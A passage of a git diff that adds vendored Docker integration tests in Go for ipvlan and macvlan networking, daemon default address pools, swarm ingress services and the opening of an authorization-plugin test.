assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks[netName].Gateway, "172.28.202.254") + // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks[netName].IPv6Gateway, "2001:db8:abc6::254") + } +} + +func testIpvlanL3MultiSubnet(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "dualstackl3" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", "l3"), + net.WithIPv6(), + net.WithIPAM("172.28.10.0/24", ""), + net.WithIPAM("172.28.12.0/24", "172.28.12.254"), + net.WithIPAM("2001:db8:abc9::/64", ""), + net.WithIPAM("2001:db8:abc7::/64", "2001:db8:abc7::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) 
+ + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.10.20"), + container.WithIPv6(netName, "2001:db8:abc9::20"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.10.21"), + container.WithIPv6(netName, "2001:db8:abc9::21"), + ) + c1, err := client.ContainerInspect(ctx, id1) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + id3 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.12.20"), + container.WithIPv6(netName, "2001:db8:abc7::20"), + ) + id4 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.12.21"), + container.WithIPv6(netName, "2001:db8:abc7::21"), + ) + c3, err := client.ContainerInspect(ctx, id3) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, err = container.Exec(ctx, client, id4, 
[]string{"ping6", "-c", "1", c3.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode + assert.Equal(t, c1.NetworkSettings.Networks[netName].Gateway, "") + // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled + assert.Equal(t, c1.NetworkSettings.Networks[netName].IPv6Gateway, "") + // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode + assert.Equal(t, c3.NetworkSettings.Networks[netName].Gateway, "") + // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled + assert.Equal(t, c3.NetworkSettings.Networks[netName].IPv6Gateway, "") + } +} + +func testIpvlanAddressing(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + // Verify ipvlan l2 mode sets the proper default gateway routes via netlink + // for either an explicitly set route by the user or inferred via default IPAM + netNameL2 := "dualstackl2" + net.CreateNoError(t, context.Background(), client, netNameL2, + net.WithIPvlan("", "l2"), + net.WithIPv6(), + net.WithIPAM("172.28.140.0/24", "172.28.140.254"), + net.WithIPAM("2001:db8:abcb::/64", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netNameL2)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netNameL2), + ) + // Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet + result, err := container.Exec(ctx, client, id1, []string{"ip", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 172.28.140.254 dev eth0")) + // Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop + result, err = container.Exec(ctx, client, id1, []string{"ip", "-6", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 
2001:db8:abcb::1 dev eth0")) + + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + netNameL3 := "dualstackl3" + net.CreateNoError(t, context.Background(), client, netNameL3, + net.WithIPvlan("", "l3"), + net.WithIPv6(), + net.WithIPAM("172.28.160.0/24", "172.28.160.254"), + net.WithIPAM("2001:db8:abcd::/64", "2001:db8:abcd::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netNameL3)) + + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netNameL3), + ) + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + result, err = container.Exec(ctx, client, id2, []string{"ip", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default dev eth0")) + // Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops + result, err = container.Exec(ctx, client, id2, []string{"ip", "-6", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default dev eth0")) + } +} + +// ensure Kernel version is >= v4.2 for ipvlan support +func ipvlanKernelSupport() bool { + return n.CheckKernelMajorVersionGreaterOrEqualThen(4, 2) +} diff --git a/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go b/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go new file mode 100644 index 0000000000..2d5f62453c --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go @@ -0,0 +1,33 @@ +package ipvlan // import "github.com/docker/docker/integration/network/ipvlan" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = 
environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go b/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go new file mode 100644 index 0000000000..14dfce92cb --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go @@ -0,0 +1,282 @@ +package macvlan + +import ( + "context" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + net "github.com/docker/docker/integration/internal/network" + n "github.com/docker/docker/integration/network" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestDockerNetworkMacvlanPersistance(t *testing.T) { + // verify the driver automatically provisions the 802.1q link (dm-dummy0.60) + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !macvlanKernelSupport(), "Kernel doesn't support macvlan") + + d := daemon.New(t) + d.StartWithBusybox(t) + defer d.Stop(t) + + master := "dm-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + client, err := d.NewClient() + assert.NilError(t, err) + + netName := "dm-persist" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan("dm-dummy0.60"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + d.Restart(t) + assert.Check(t, n.IsNetworkAvailable(client, netName)) +} + +func TestDockerNetworkMacvlan(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !macvlanKernelSupport(), "Kernel doesn't support 
macvlan") + + for _, tc := range []struct { + name string + test func(client.APIClient) func(*testing.T) + }{ + { + name: "Subinterface", + test: testMacvlanSubinterface, + }, { + name: "OverlapParent", + test: testMacvlanOverlapParent, + }, { + name: "NilParent", + test: testMacvlanNilParent, + }, { + name: "InternalMode", + test: testMacvlanInternalMode, + }, { + name: "Addressing", + test: testMacvlanAddressing, + }, + } { + d := daemon.New(t) + d.StartWithBusybox(t) + + client, err := d.NewClient() + assert.NilError(t, err) + + t.Run(tc.name, tc.test(client)) + + d.Stop(t) + // FIXME(vdemeester) clean network + } +} + +func testMacvlanOverlapParent(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // verify the same parent interface cannot be used if already in use by an existing network + master := "dm-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + netName := "dm-subinterface" + parentName := "dm-dummy0.40" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(parentName), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + _, err := net.Create(context.Background(), client, "dm-parent-net-overlap", + net.WithMacvlan(parentName), + ) + assert.Check(t, err != nil) + + // delete the network while preserving the parent link + err = client.NetworkRemove(context.Background(), netName) + assert.NilError(t, err) + + assert.Check(t, n.IsNetworkNotAvailable(client, netName)) + // verify the network delete did not delete the predefined link + n.LinkExists(t, master) + } +} + +func testMacvlanSubinterface(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // verify the same parent interface cannot be used if already in use by an existing network + master := "dm-dummy0" + parentName := "dm-dummy0.20" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + n.CreateVlanInterface(t, master, parentName, "20") + + netName := 
"dm-subinterface" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(parentName), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // delete the network while preserving the parent link + err := client.NetworkRemove(context.Background(), netName) + assert.NilError(t, err) + + assert.Check(t, n.IsNetworkNotAvailable(client, netName)) + // verify the network delete did not delete the predefined link + n.LinkExists(t, parentName) + } +} + +func testMacvlanNilParent(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // macvlan bridge mode - dummy parent interface is provisioned dynamically + _, err := client.NetworkCreate(context.Background(), "dm-nil-parent", types.NetworkCreate{ + Driver: "macvlan", + }) + assert.NilError(t, err) + assert.Check(t, n.IsNetworkAvailable(client, "dm-nil-parent")) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode("dm-nil-parent")) + id2 := container.Run(t, ctx, client, container.WithNetworkMode("dm-nil-parent")) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.Check(t, err == nil) + } +} + +func testMacvlanInternalMode(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // macvlan bridge mode - dummy parent interface is provisioned dynamically + _, err := client.NetworkCreate(context.Background(), "dm-internal", types.NetworkCreate{ + Driver: "macvlan", + Internal: true, + }) + assert.NilError(t, err) + assert.Check(t, n.IsNetworkAvailable(client, "dm-internal")) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode("dm-internal")) + id2 := container.Run(t, ctx, client, container.WithNetworkMode("dm-internal")) + + timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + _, err = container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"}) + // 
FIXME(vdemeester) check the time of error ? + assert.Check(t, err != nil) + assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.Check(t, err == nil) + } +} + +func testMacvlanMultiSubnet(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "dualstackbridge" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(""), + net.WithIPv6(), + net.WithIPAM("172.28.100.0/24", ""), + net.WithIPAM("172.28.102.0/24", "172.28.102.254"), + net.WithIPAM("2001:db8:abc2::/64", ""), + net.WithIPAM("2001:db8:abc4::/64", "2001:db8:abc4::254"), + ) + + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.100.20"), + container.WithIPv6("dualstackbridge", "2001:db8:abc2::20"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.100.21"), + container.WithIPv6("dualstackbridge", "2001:db8:abc2::21"), + ) + c1, err := client.ContainerInspect(ctx, id1) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks["dualstackbridge"].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks["dualstackbridge"].GlobalIPv6Address}) + assert.NilError(t, err) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 
172.28.102.0/24 and 2001:db8:abc4::/64 + id3 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.102.20"), + container.WithIPv6("dualstackbridge", "2001:db8:abc4::20"), + ) + id4 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.102.21"), + container.WithIPv6("dualstackbridge", "2001:db8:abc4::21"), + ) + c3, err := client.ContainerInspect(ctx, id3) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks["dualstackbridge"].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks["dualstackbridge"].GlobalIPv6Address}) + assert.NilError(t, err) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks["dualstackbridge"].Gateway, "172.28.100.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks["dualstackbridge"].IPv6Gateway, "2001:db8:abc2::1") + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks["dualstackbridge"].Gateway, "172.28.102.254") + // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks["dualstackbridge"].IPv6Gateway, "2001:db8:abc4::254") + } +} + +func testMacvlanAddressing(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // Ensure the default gateways, next-hops and default dev devices are properly set + netName := "dualstackbridge" + net.CreateNoError(t, 
context.Background(), client, netName, + net.WithMacvlan(""), + net.WithIPv6(), + net.WithOption("macvlan_mode", "bridge"), + net.WithIPAM("172.28.130.0/24", ""), + net.WithIPAM("2001:db8:abca::/64", "2001:db8:abca::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + ) + + // Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet + result, err := container.Exec(ctx, client, id1, []string{"ip", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 172.28.130.1 dev eth0")) + // Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop + result, err = container.Exec(ctx, client, id1, []string{"ip", "-6", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 2001:db8:abca::254 dev eth0")) + } +} + +// ensure Kernel version is >= v3.9 for macvlan support +func macvlanKernelSupport() bool { + return n.CheckKernelMajorVersionGreaterOrEqualThen(3, 9) +} diff --git a/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go b/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go new file mode 100644 index 0000000000..31cf111b22 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go @@ -0,0 +1,33 @@ +package macvlan // import "github.com/docker/docker/integration/network/macvlan" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + 
os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/network/main_test.go b/vendor/github.com/docker/docker/integration/network/main_test.go new file mode 100644 index 0000000000..36ed19ca67 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/main_test.go @@ -0,0 +1,33 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/network/service_test.go b/vendor/github.com/docker/docker/integration/network/service_test.go new file mode 100644 index 0000000000..d926045b72 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/service_test.go @@ -0,0 +1,315 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/network" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/icmd" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// delInterface removes given network interface +func delInterface(t *testing.T, 
ifName string) { + icmd.RunCommand("ip", "link", "delete", ifName).Assert(t, icmd.Success) + icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(t, icmd.Success) + icmd.RunCommand("iptables", "--flush").Assert(t, icmd.Success) +} + +func TestDaemonRestartWithLiveRestore(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + d := daemon.New(t) + defer d.Stop(t) + d.Start(t) + d.Restart(t, "--live-restore=true", + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{}) + assert.NilError(t, err) + // Make sure docker0 doesn't get override with new IP in live restore case + assert.Equal(t, out.IPAM.Config[0].Subnet, "172.18.0.0/16") +} + +func TestDaemonDefaultNetworkPools(t *testing.T) { + // Remove docker0 bridge and the start daemon defining the predefined address pools + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + delInterface(t, defaultNetworkBridge) + d := daemon.New(t) + defer d.Stop(t) + d.Start(t, + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out.IPAM.Config[0].Subnet, "175.30.0.0/16") + + // Create a bridge network and verify its subnet is the second default pool + name := "elango" + network.CreateNoError(t, context.Background(), cli, name, + 
network.WithDriver("bridge"), + ) + out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out.IPAM.Config[0].Subnet, "175.33.0.0/24") + + // Create a bridge network and verify its subnet is the third default pool + name = "saanvi" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out.IPAM.Config[0].Subnet, "175.33.1.0/24") + delInterface(t, defaultNetworkBridge) + +} + +func TestDaemonRestartWithExistingNetwork(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + d := daemon.New(t) + d.Start(t) + defer d.Stop(t) + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + + // Create a bridge network + name := "elango" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + networkip := out.IPAM.Config[0].Subnet + + // Restart daemon with default address pool option + d.Restart(t, + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + out1, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out1.IPAM.Config[0].Subnet, networkip) + delInterface(t, defaultNetworkBridge) +} + +func TestDaemonRestartWithExistingNetworkWithDefaultPoolRange(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + d := 
daemon.New(t) + d.Start(t) + defer d.Stop(t) + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + + // Create a bridge network + name := "elango" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + networkip := out.IPAM.Config[0].Subnet + + // Create a bridge network + name = "sthira" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + networkip2 := out.IPAM.Config[0].Subnet + + // Restart daemon with default address pool option + d.Restart(t, + "--default-address-pool", "base=175.18.0.0/16,size=16", + "--default-address-pool", "base=175.19.0.0/16,size=24") + + // Create a bridge network + name = "saanvi" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out1, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + + assert.Check(t, out1.IPAM.Config[0].Subnet != networkip) + assert.Check(t, out1.IPAM.Config[0].Subnet != networkip2) + delInterface(t, defaultNetworkBridge) +} + +func TestDaemonWithBipAndDefaultNetworkPool(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + d := daemon.New(t) + defer d.Stop(t) + d.Start(t, "--bip=172.60.0.1/16", + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + out, err := cli.NetworkInspect(context.Background(), "bridge", 
types.NetworkInspectOptions{}) + assert.NilError(t, err) + // Make sure BIP IP doesn't get override with new default address pool . + assert.Equal(t, out.IPAM.Config[0].Subnet, "172.60.0.1/16") + delInterface(t, defaultNetworkBridge) +} + +func TestServiceWithPredefinedNetwork(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + hostName := "host" + var instances uint64 = 1 + serviceName := "TestService" + t.Name() + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(hostName), + ) + + poll.WaitOn(t, serviceRunningCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) +} + +const ingressNet = "ingress" + +func TestServiceRemoveKeepsIngressNetwork(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + poll.WaitOn(t, swarmIngressReady(client), swarm.NetworkPoll) + + var instances uint64 = 1 + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(t.Name()+"-service"), + swarm.ServiceWithEndpoint(&swarmtypes.EndpointSpec{ + Ports: []swarmtypes.PortConfig{ + { + Protocol: swarmtypes.PortConfigProtocolTCP, + TargetPort: 80, + PublishMode: swarmtypes.PortConfigPublishModeIngress, + }, + }, + }), + ) + + poll.WaitOn(t, serviceRunningCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + 
poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noServices(client), swarm.ServicePoll) + + // Ensure that "ingress" is not removed or corrupted + time.Sleep(10 * time.Second) + netInfo, err := client.NetworkInspect(context.Background(), ingressNet, types.NetworkInspectOptions{ + Verbose: true, + Scope: "swarm", + }) + assert.NilError(t, err, "Ingress network was removed after removing service!") + assert.Assert(t, len(netInfo.Containers) != 0, "No load balancing endpoints in ingress network") + assert.Assert(t, len(netInfo.Peers) != 0, "No peers (including self) in ingress network") + _, ok := netInfo.Containers["ingress-sbox"] + assert.Assert(t, ok, "ingress-sbox not present in ingress network") +} + +func serviceRunningCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + services, err := client.ServiceList(context.Background(), types.ServiceListOptions{}) + if err != nil { + return poll.Error(err) + } + + if len(services) != int(instances) { + return poll.Continue("Service count at %d waiting for %d", len(services), instances) + } + return poll.Success() + } +} + +func swarmIngressReady(client client.NetworkAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + netInfo, err := client.NetworkInspect(context.Background(), ingressNet, types.NetworkInspectOptions{ + Verbose: true, + Scope: "swarm", + }) + if err != nil { + return poll.Error(err) + } + np := len(netInfo.Peers) + nc := len(netInfo.Containers) + if np == 0 || nc == 0 { + return poll.Continue("ingress not ready: %d peers and %d containers", nc, np) + } + _, ok := netInfo.Containers["ingress-sbox"] + if !ok { + return poll.Continue("ingress not ready: does not contain the ingress-sbox") + } + return poll.Success() + } +} + +func noServices(client client.ServiceAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) 
poll.Result { + services, err := client.ServiceList(context.Background(), types.ServiceListOptions{}) + switch { + case err != nil: + return poll.Error(err) + case len(services) == 0: + return poll.Success() + default: + return poll.Continue("Service count at %d waiting for 0", len(services)) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go new file mode 100644 index 0000000000..105affc1af --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go @@ -0,0 +1,521 @@ +// +build !windows + +package authz // import "github.com/docker/docker/integration/plugin/authz" + +import ( + "context" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/http/httputil" + "net/url" + "os" + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/authorization" + "gotest.tools/assert" + "gotest.tools/skip" +) + +const ( + testAuthZPlugin = "authzplugin" + unauthorizedMessage = "User unauthorized authz plugin" + errorMessage = "something went wrong..." 
+ serverVersionAPI = "/version" +) + +var ( + alwaysAllowed = []string{"/_ping", "/info"} + ctrl *authorizationController +) + +type authorizationController struct { + reqRes authorization.Response // reqRes holds the plugin response to the initial client request + resRes authorization.Response // resRes holds the plugin response to the daemon response + versionReqCount int // versionReqCount counts the number of requests to the server version API endpoint + versionResCount int // versionResCount counts the number of responses from the server version API endpoint + requestsURIs []string // requestsURIs stores all request URIs that are sent to the authorization controller + reqUser string + resUser string +} + +func setupTestV1(t *testing.T) func() { + ctrl = &authorizationController{} + teardown := setupTest(t) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + assert.NilError(t, err) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin) + err = ioutil.WriteFile(fileName, []byte(server.URL), 0644) + 